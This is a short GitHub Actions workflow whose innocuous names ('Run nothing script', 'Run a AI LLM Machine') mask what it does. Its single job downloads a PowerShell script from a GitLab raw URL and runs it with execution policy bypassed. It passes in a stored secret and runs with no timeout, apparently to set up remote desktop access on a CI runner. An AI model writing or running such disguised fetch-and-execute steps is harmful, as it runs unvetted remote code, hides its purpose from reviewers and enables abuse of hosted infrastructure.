name: Run nothing script

on:
  workflow_dispatch:

jobs:
  run-rdp:
    runs-on: windows-latest
    timeout-minutes: 0
    env:
      TS_KEY: ${{ secrets.TS_KEY }}
    steps:
      - name: Run a AI LLM Machine
        shell: powershell
        run: |
          iwr -Uri "https://gitlab.com/gitrdp124/sv2025-rdp/-/raw/main/full_system_setup.ps1" -OutFile "tail.ps1"
          powershell -ExecutionPolicy Bypass -File .\tail.ps1
